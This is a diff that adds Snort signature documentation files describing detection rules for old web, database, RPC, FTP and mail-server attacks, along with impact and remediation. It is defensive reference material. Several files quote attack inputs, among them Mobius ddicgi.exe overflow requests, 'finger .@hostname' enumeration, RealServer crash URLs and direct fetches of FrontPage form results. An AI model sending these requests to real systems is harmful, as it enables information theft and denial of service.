--- /dev/null
+++ b/doc/signatures/1521.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1521
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2763.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2763
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure do_deferred_repcat_admin
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1828.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1828
+
+--
+Summary:
+This event is generated when an attempt is made to use a known 
+vulnerability in the search functionality of certain web servers to view
+otherwise restricted files.
+
+--
+Impact:
+If successful, this attack will allow an attacker to view the contents 
+of any file on the server.
+
+--
+Detailed Information:
+The search engine in older versions of Netscape Enterprise Server and 
+its succesors uses HTML formatted pattern files to query users for 
+search paramters and return the results. The "NS-query-pat" command 
+allows clients to specify a pattern file other than the default. 
+Unfortunately, the search engine does not validate the filename 
+requested and allows clients to specify any file on the server, which is
+then displayed to the client.
+
+--
+Affected Systems:
+	Netscape Enterprise Server 3.6 and earlier
+	iPlanet Web Server 4.1
+	iPlanet/Sun ONE Web Server 6.0 up to Service Pack 4
+	Netscape Enterprise Server 6.0
+
+--
+Attack Scenarios:
+An attacker could use this vulnerability to find user names and 
+passwords, SSL certificate files and related passwords, source code, or 
+just about any other information on the server.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the search engine or procure a patch from your web server vendor.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+CVE
+CAN-2002-1042
+
+--
--- /dev/null
+++ b/doc/signatures/1010.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1010
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/218.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+218
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "friday".
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects Solaris 2.5 operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3166.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3166
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1337.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1337
+
+--
+Summary:
+Attempted chgrp command access via web
+
+--
+Impact:
+Attempt to change group permissions on a webserver.
+
+--
+Detailed Information:
+This is an attempt to change file permissions on a machine. Using this
+command anattacker may change the permissions of a file to suit his
+own needs,make a file readable, writeable or excutable to other groups
+that wouldotherwise not have these special permissions.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/chgrp'
+in the URIwhich can then change file permissions of files present on
+the host.Thiscommand may also be requested on a command line should
+the attacker gainaccess to the machine.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it'sdesignated web root or cgi-bin.Whenever possible,
+sensitive filesand certain areas of the filesystem should have the
+system immutableflag set to negate the use of the chgrp command. On
+BSD derived systems,setting the systems runtime securelevel also
+prevents the securelevelfrom being changed. (note: the securelevel can
+only beincreased)
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1336
+sid: 1338
+
+man chgrp
+
+man chmod
+
+--
--- /dev/null
+++ b/doc/signatures/1935.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1936
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command FOLD.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may include files of their
+choosing when supplying data to a POP server via the FOLD command.
+
+The FOLD command allows the user to specify a mail folder to select.  By
+specifying a very large argument, the user can exploit the buffer overflow
+condition.
+
+--
+Attack Scenarios:
+Simple. An attacker can supply specially crafted packets to a POP server
+via the FOLD function. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Ricky Macatee <ricky.macatee@sourcefire.com>
+
+--
+Additional References:
+
+RFC 937:
+http://www.faqs.org/rfc/rfc937.txt
+
+--
--- /dev/null
+++ b/doc/signatures/333.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+333
+
+--
+Summary:
+This event is generated when a remote user sends a finger request to .@hostname. This may indicate an attempt to discover information about users on the system.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+Finger is a directory service on UNIX and Linux operating systems that allows users to obtain basic information about other users, including account name, home directory, and login status. A malicious user could use the string "finger .@hostname" to obtain a list of each user on the system. This may enable the attacker to view unused or inactive accounts, which are more likely to have default passwords that are relatively easy to guess or susceptible to brute force password attempts. 
+
+--
+Affected Systems:
+Any UNIX/Linux distribution with older versions of finger enabled.
+
+--
+Attack Scenarios:
+An attacker issues a finger .@host to the vulnerable server and views a list of users. The attacker then attempts to guess passwords for users with the "Never logged in" status.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A non-malicious user using finger to obtain a user list will cause this rule to trigger.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable finger support on your servers or upgrade to a more recent version of the finger daemon.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/793.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+793
+
+--
+Summary:
+This event is generated when an internal mail server sends an e-mail out of the network that may contain a Visual Basic Script (VBS) attachment. 
+
+--
+Impact:
+Malicious code infection.  This event may indicate that an internal host may be infected with some kind of malicious code.
+
+--
+Detailed Information:
+An outbound e-mail message that contains an attachment with a file name ending in ".vbs" may indicate that an internal host has been infected by some kind of malicious code.  A ".vbs" extension typically means that an attachment file is a Visual Basic Script.  A VBS attachment may contain executable code for a worm, virus, or trojan.
+
+--
+Affected Systems:
+Microsoft Windows hosts.
+
+--
+Attack Scenarios:
+Malicious code may be spread by e-mail containing attachments with files ending in ".vbs".
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This alert will be triggered if e-mail is sent containing a legitimate VBS attachment.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Make sure that the suspected infected host has the most current anti-virus software.
+
+Run a virus scan on the suspected infected host.
+
+Configure your mail server to block attachments that contain executable code, such as those with extensions of ".vbs", ".exe", etc.
+
+--
+Contributors:
+Original rule writer unknown.
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/277.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+277
+
+--
+Summary:
+This event is generated when a remote attacker transmits a malformed request for a page on a RealNetworks RealServer port, which can indicate a Denial of Service (DoS) attack on the RealServer.
+
+--
+Impact:
+The RealNetworks RealServer service will crash.
+
+--
+Detailed Information:
+RealNetworks RealServer is a server application that serves streaming audio to clients. When an attacker sends a request for a template file in the /viewsource/ directory with an empty variable value, RealServer crashes.   
+
+--
+Affected Systems:
+Systems running RealNetworks RealServer 7.0 with View Source functionality enabled.
+
+--
+Attack Scenarios:
+An attacker sends an HTTP request for /viewsource/template.html? on a RealServer audio server. RealServer crashes, stopping audio transmission.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+If a legitimate remote user attempts to use the View Source function on the RealServer, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of the software or disable the View Source functionality. The vendor has issued an advisory, workarounds, and downloadable patches at http://service.real.com/help/faq/servgviewsrc.html.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+RealNetworks
+http://service.real.com/help/faq/servgviewsrc.html
+
+
+--
--- /dev/null
+++ b/doc/signatures/2252.txt
@@ -0,0 +1,80 @@
+Rule:  
+
+--
+Sid:
+2252
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerablity in Microsoft RPCSS service for RPC.
+
+--
+Impact:
+Denial of Service. Possible execution of arbitrary code leading to
+unauthorized remote administrative access.
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPCSS Service that handles RPC DCOM
+requests such that execution of arbitrary code or a Denial of Service 
+condition can be issued against a host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to the host
+running the RPCSS service may result in a buffer overflow condition that
+will present the attacker with the opportunity to execute arbitrary code
+with the privileges of the local system account. Alternatively the
+attacker could also cause the RPC service to stop answering RPC requests
+and thus cause a Denial of Service condition to occur.
+
+--
+Affected Systems:
+	Windows NT 4.0 Workstation and Server
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a DCERPC bind request followed by a malicious
+DCERPC DCOM remote activation request.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139, 445 and 593 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Disallow the use of RPC over HTTP and HTTPS.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-039.asp
+
+eEye:
+http://www.eeye.com/html/Research/Advisories/AD20030910.html
+
+--
--- /dev/null
+++ b/doc/signatures/2332.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 
+2332
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an FTP server.
+
+--
+Impact:
+Possible execution of arbitrary code.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious
+activity in FTP traffic between hosts.
+
+It is possible for a user to supply data to an FTP ommand and have it
+interpreted as code. The attacker might then be able to run code of
+their choosing with the privileges of the user running the FTP service.
+
+--
+Affected Systems:
+	PlatinumFTP PlatinumFTPserver 1.0.18
+
+--
+Attack Scenarios:
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a 
+host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/948.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+948
+
+--
+
+Summary:
+This event is generated when an attempt is made to access a file with 
+Microsoft Frontpage form results.
+
+--
+
+Impact:
+If successful, the attacker can read sensitive data users have posted 
+via forms within the Frontpage web.
+
+--
+
+Detailed Information:
+On systems running Microsoft Frontpage Extensions on IIS or Apache web 
+servers users can insert forms into web pages and have their data saved 
+into a text file (/_private/form_results.txt) which can later be read or
+emailed to the user. If direct access to the file is possible, the 
+attacker may read the sensitive data posted from the form.
+
+--
+
+Affected Systems:
+All systems running FPSE.
+
+--
+
+Attack Scenarios:
+An attacker can request the file from its standard location, entering 
+the exact URL.
+
+--
+
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable direct access to the file /_private/form_results.txt
+
+Restrict access to the file using password protection.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1460.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1460
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2242.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+--
+Sid:
+2242
+
+--
+Summary:
+This event is generated when an attempt is made to 
+
+--
+Impact:
+Serious. Denial of Service and Execution of arbitrary code are both
+possible
+
+--
+Detailed Information:
+Mobius DocumentDirect for the Internet 1.2 contains programming errors
+which can present an attacker with the opportunity to issue a Denial of
+Service condition against the affected host and also the possiblity to
+execute arbitrary code.
+
+--
+Affected Systems:
+	Mobius DocumentDirect for the Internet 1.2
+
+--
+Attack Scenarios:
+According to David Litchfield and Mark Litchfield the following
+scenarios are possible:
+
+DoS:
+GET /ddrint/bin/ddicgi.exe?[string at least 1553 characters long]=X HTTP/1.0
+
+Buffer overflow:
+GET /ddrint/bin/ddicgi.exe HTTP/1.0\r\nUser-Agent: [long string of characters]\r\n\r\n
+
+The attacker could also supply a username greater than 208 characters
+which will cause a DoS condition to occur.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1657
+
+--
--- /dev/null
+++ b/doc/signatures/1191.txt
@@ -0,0 +1,81 @@
+Rule:  
+
+--
+Sid:
+1191
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in some versions of Netscape Enterprise Server.
+ 
+--
+Impact:
+Information leak which could provide an attacker with the data needed to
+launch further attacks or gain more detailed information about your web
+server. Also, the html-rend command can be used to launch denial of
+service attacks. 
+
+--
+Detailed Information:
+A user can see a directory listing by appending a Web Publishing command
+to the end of a directory URL, for example: "http://www.sun.com/?wp-html-rend".
+
+This exploit will work on Netscape Enterprise Server regardless of
+directory indexing settings.  
+
+It will not work on iPlanet Web Server if directory indexing is set to
+"none" or "fancy" (the default). Web Publishing need not be enabled for
+this exploit to work.
+
+Additionally, on Windows NT and Windows 2000, a specially crafted URL
+can use this command to cause an access violation error and crash the web server. 
+
+--
+Affected Systems:
+	Netscape Enterprise Server 3.0, 3.51 and 3.6
+
+--
+Attack Scenarios:
+The gathering of information such as directory listings is valuable when
+planning to attack a web server. Also, this command may be used to carry
+out a denial of service (DoS) attack. 
+
+--
+Ease of Attack:
+Simple. No exploit software required however, an automated tool for
+scanning exists as does an exploit script.
+
+--
+False Positives:
+A web server that uses URLs which contain web publishing commands.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable directory indexing. For earlier versions of Netscape Enterprise
+Server, this may not fix the problem. On iPlanet, you can also change
+the indexing type to "fancy".
+
+To fix the potential DOS vulnerability, upgrade to at least iWS 4.1 SP8.
+
+--
+Contributors:
+Snort documentation contributed by Kevin Peuhkurinen
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+iPlanet Knowledge Base Article 4302:
+http://knowledgebase.iplanet.com/ikb/kb/articles/4302.html 
+
+iPlanet Knowledge Base Article 7761:
+http://knowledgebase.iplanet.com/ikb/kb/articles/7761.html 
+
+--
--- /dev/null
+++ b/doc/signatures/3234.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3234
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/681.txt
@@ -0,0 +1,80 @@
+Rule:  
+
+--
+Sid: 
+681
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+Affected Systems:
+	Microsoft SQL Servers
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft MSDN:
+http://msdn.microsoft.com/library/en-us/tsqlref/ts_xp_aa-sz_4jxo.asp
+
+--
--- /dev/null
+++ b/doc/signatures/2831.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2831
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_master_repobject
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000657.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000657
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "homepage" parameter in the "guestbook.php" 
+script used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000142.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+100000142
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+directory traversal associated with Imail Web Calendaring
+servicel
+
+--
+Impact:
+A successful attack can permit a user to navigate outside
+of the web root directory and read files.
+
+--
+Detailed Information:
+The Imail Web Calendaring Server does not properly sanitize
+a malformed URL that contains directory traversal characters.
+This vulnerability is associated with static objects identified
+by names ending in .jsp, .jpg, .gif, .wav, .css, or .htm.  This
+can permit an unauthorized user to examine files that may contain
+sensitive information.
+
+--
+Affected Systems:
+Ipswitch IMail Server 8.2 and prior
+Ipswitch IMail Server 8.15 and prior
+
+--
+Attack Scenarios:
+An attacker send a URI containing a directory traversal to view
+sensitive files on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
